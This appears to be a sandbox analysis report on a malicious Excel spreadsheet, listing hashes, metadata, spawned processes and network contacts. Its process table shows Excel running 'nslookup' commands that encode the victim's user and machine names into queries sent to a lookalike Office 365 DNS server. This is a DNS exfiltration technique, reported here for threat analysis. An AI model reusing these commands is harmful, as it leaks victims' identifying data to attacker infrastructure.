| Field | Value |
|---|---|
| File name | 2a07f8bae7882c42b0c99975df251cf7c05d5a4b4fe6678cd55c84ce0b83edda.xls |
| Full analysis | https://app.any.run/tasks/a1761359-5238-473b-9d96-821d4fe1e5ad |
| Verdict | Malicious activity |
| Analysis date | May 15, 2019, 01:25:34 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
| File info | Microsoft Excel 2007+ |
| MD5 | F552BC297253AA7D59548758DA6C7025 |
| SHA1 | 3209272D852497198499141AF0D3CEEB77100768 |
| SHA256 | 2A07F8BAE7882C42B0C99975DF251CF7C05D5A4B4FE6678CD55C84CE0B83EDDA |
| SSDEEP | 768:MOChhPQduBz1Eqo5U3tMn2FK9JDl6KWfKHGvWBsjFqUAHOQVVxhfqjs6W:MZhOduBzqq2U3tM2iDYJSGwgFqzH9hqY |
| Extension | File type |
|---|---|
| .xlam | Excel Macro-enabled Open XML add-in (42.4) |
| .xlsm | Excel Microsoft Office Open XML Format document (with Macro) (29.2) |
| .xlsx | Excel Microsoft Office Open XML Format document (17.3) |
| .zip | Open Packaging Conventions container (8.9) |
| .zip | ZIP compressed archive (2) |
| Property | Value |
|---|---|
| AppVersion | 16.03 |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| Company | - |
| TitlesOfParts | |
| HeadingPairs | |
| ScaleCrop | No |
| DocSecurity | None |
| Application | Microsoft Excel |
| ModifyDate | 2019:05:13 19:16:02Z |
| CreateDate | 2015:06:05 18:19:34Z |
| LastModifiedBy | Daniel Hejda |
| Creator | Daniel Hejda |
| Property | Value |
|---|---|
| ZipFileName | [Content_Types].xml |
| ZipUncompressedSize | 1996 |
| ZipCompressedSize | 486 |
| ZipCRC | 0xfaada595 |
| ZipModifyDate | 1980:01:01 00:00:00 |
| ZipCompression | Deflated |
| ZipBitFlag | 0x0006 |
| ZipRequiredVersion | 20 |
| PID | CMD | Path | Indicators | Parent process | User | Company | Integrity Level | Description | Version | Exit code |
|---|---|---|---|---|---|---|---|---|---|---|
| 3328 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | admin | Microsoft Corporation | MEDIUM | Microsoft Excel | 14.0.6024.1000 | |
| 3956 | CMD.exe /c nslookup USER-PC.promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\CMD.exe | — | EXCEL.EXE | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0 |
| 2364 | CMD.exe /c nslookup admin.promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\CMD.exe | — | EXCEL.EXE | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0 |
| 1712 | CMD.exe /c nslookup .promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\CMD.exe | — | EXCEL.EXE | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0 |
| 128 | CMD.exe /c nslookup USER-PC.promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\CMD.exe | — | EXCEL.EXE | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0 |
| 1012 | nslookup admin.promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\nslookup.exe | — | CMD.exe | admin | Microsoft Corporation | MEDIUM | nslookup | 6.1.7600.16385 (win7_rtm.090713-1255) | 0 |
| 2308 | nslookup USER-PC.promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\nslookup.exe | — | CMD.exe | admin | Microsoft Corporation | MEDIUM | nslookup | 6.1.7600.16385 (win7_rtm.090713-1255) | 0 |
| 2244 | nslookup USER-PC.promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\nslookup.exe | — | CMD.exe | admin | Microsoft Corporation | MEDIUM | nslookup | 6.1.7600.16385 (win7_rtm.090713-1255) | 0 |
| 1564 | nslookup .promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\nslookup.exe | — | CMD.exe | admin | Microsoft Corporation | MEDIUM | nslookup | 6.1.7600.16385 (win7_rtm.090713-1255) | 0 |
| 3912 | CMD.exe /c nslookup admin-run-macro.promedcscom.onmicrosoft.com portal.offices365.eu | C:\Windows\system32\CMD.exe | — | EXCEL.EXE | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 6.1.7601.17514 (win7sp1_rtm.101119-1850) | |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3328 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVREE83.tmp.cvr | — | — | — |
| 3328 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\Excel8.0\MSForms.exd | tlb | 167CA8C268478495E76CD4A60F0DD125 | 69235C2681D65BF88F4C37AA40A04B2DA1490957EC8650F3BD78C1E69D749AE7 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1564 | nslookup.exe | 51.144.73.213:53 | portal.offices365.eu | Microsoft Corporation | NL | unknown |
1012 | nslookup.exe | 51.144.73.213:53 | portal.offices365.eu | Microsoft Corporation | NL | unknown |
2308 | nslookup.exe | 51.144.73.213:53 | portal.offices365.eu | Microsoft Corporation | NL | unknown |
2244 | nslookup.exe | 51.144.73.213:53 | portal.offices365.eu | Microsoft Corporation | NL | unknown |
1812 | nslookup.exe | 51.144.73.213:53 | portal.offices365.eu | Microsoft Corporation | NL | unknown |
— | — | 51.144.73.213:53 | portal.offices365.eu | Microsoft Corporation | NL | unknown |
| Domain | IP | Reputation |
|---|---|---|
| portal.offices365.eu | | unknown |
| 213.73.144.51.in-addr.arpa | | unknown |
| admin.promedcscom.onmicrosoft.com | | unknown |
| USER-PC.promedcscom.onmicrosoft.com | | whitelisted |
| admin-run-macro.promedcscom.onmicrosoft.com | | unknown |